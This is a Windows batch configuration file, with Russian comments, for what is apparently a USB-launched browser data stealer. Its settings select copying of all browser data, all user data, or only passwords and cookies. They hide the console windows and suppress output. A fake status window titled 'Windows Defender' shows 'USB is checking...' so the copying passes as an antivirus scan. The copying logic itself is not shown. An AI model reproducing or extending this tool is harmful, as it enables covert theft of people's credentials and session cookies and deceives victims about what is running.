@echo off





::++++++++++++++++++++++++++++++ Основное ++++++++++++++++++++++++++++++
::======================================================================


	::----------- Печать в cmd вводимых команд -----------
		:: echo on  - включить
		:: echo off - выключить
		:: ""       - (пустое значение) по-умолчанию
  			
			set "echoOn="
	%echoOn%


	::------------------ Тип копиравания -----------------
		:: all  - все данные браузера
		:: user - все данные пользователя
		:: pass - только пароли и кукки

			set "mode=pass"


	::-------------- Режим тестового запуска -------------
		:: true - запуск в тестовом режиме,  
		:: не копирует данные (создаёт пустые папки).
		:: В остальных случаях производит копирование.

			set "test=false"


	::---------------- Оповещение об окончании ---------------
		:: Если значение true, то в консоль будет 
		:: выведенно сообщение по окончании.
		:: В остальных случаях копирование в скрытом 
		:: режиме.
		
			set "check=true"


	::----------------------- Дебаг мод ----------------------
		:: Если значение true, то будет включён режим 
		:: отладки.
		:: В остальных случаях стандартный режим.

			set "debug=false"


::++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++





::+++++++++++++++++++++++++++ Создание задач +++++++++++++++++++++++++++
::======================================================================


	::------------- Приоритет создаваемых задач -------------
		:: /realtime    - реального времени
		:: /high        - высокий
		:: /normal      - нормальный
		:: /low         - низкий
		:: /abovenormal - выше среднего
		:: /belownormal - ниже среднего

			set "taskPriority=/realtime"


	::-------------- Открыти окна cmd для задач --------------
		:: /b   - не открывать
		:: /max - открывать в развёрнутом виде
		:: /min - открывать в свёрнутом виде
		:: ""   - (пустое значение) по-умолчанию

			set "taskCmd=/b"


	::------------ Сообщения от создаваемой задачи -----------
		:: >nul - отключить
		:: ""   - (пустое значение) по-умолчанию

			set "taskMessage=>nul"


	::-------------- Закрытие окна по завершении -------------
		:: pause - не закрывать
		:: ""    - (пустое значение) закрыть

			set "pause="


::++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++





::+++++++++++++++++++++++++++++ Копирование ++++++++++++++++++++++++++++
::======================================================================


	::--------- Уровень параллелизма при копировании ---------
			set "mtLevel=8"


	::------------- Открыти окна cmd копирования :------------
		:: /b   - не открывать
		:: /max - открывать в развёрнутом виде
		:: /min - открывать в свёрнутом виде
		:: ""   - (пустое значение) по-умолчанию

			set "robocopyCmd=/b"


	::----------- Вывод информации при копировании -----------
		:: >nul - вывод отключён
		:: ""   - (пустое значение) вывод включён

			set "robocopyDisplay=>nul"


	::------- Уровень вывода информации при копировании ------
		:: /np  - без хода процесса - не отображать число 
		::        скопированных %
		:: /njh - без заголовка задания
		:: /njs - без сведений о задании

			set "robocopyDisplayLevel=/np /njh /njs"


	::-------------- Закрытие окна по завершении -------------
		:: pause - не закрывать
		:: ""    - (пустое значение) закрыть
		
			set "robocopyPause="

::++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++





::+++++++++++++++++++++++ Оповещение об окончании ++++++++++++++++++++++
::======================================================================


	::------- Название окна cmd с информацией о статусе ------
			set "checkTitle=Windows Defender"


	::----------------- Затравачное сообщение ----------------
			set "checkFirstMessage=USB is checking..."


	::----------------- Завершающее сообщение ----------------
			set "checkLastMessage=Success"


	::----------------------- Ожидание -----------------------
		:: pause - ожидать действия пользователя
		:: ""    - (пустое значение) закрывать cmd сразу 
		::         после завершения проверки

			set "checkPause=pause"

::++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++










::++++++++++++++++++++++++++++ НЕ НАСТРОЙКИ ++++++++++++++++++++++++++++
::======================================================================

	if %debug%==true (goto debug) else (goto end)

	:debug
		set "echoOn=echo on"
		set "check=true"
		set "taskCmd=/max"
		set "taskMessage="
		set "pause=pause"
		set "robocopyCmd=/max"
		set "robocopyDisplay="
		set "robocopyDisplayLevel="
		set "robocopyPause=pause"
		set "checkPause=pause"




	:end
		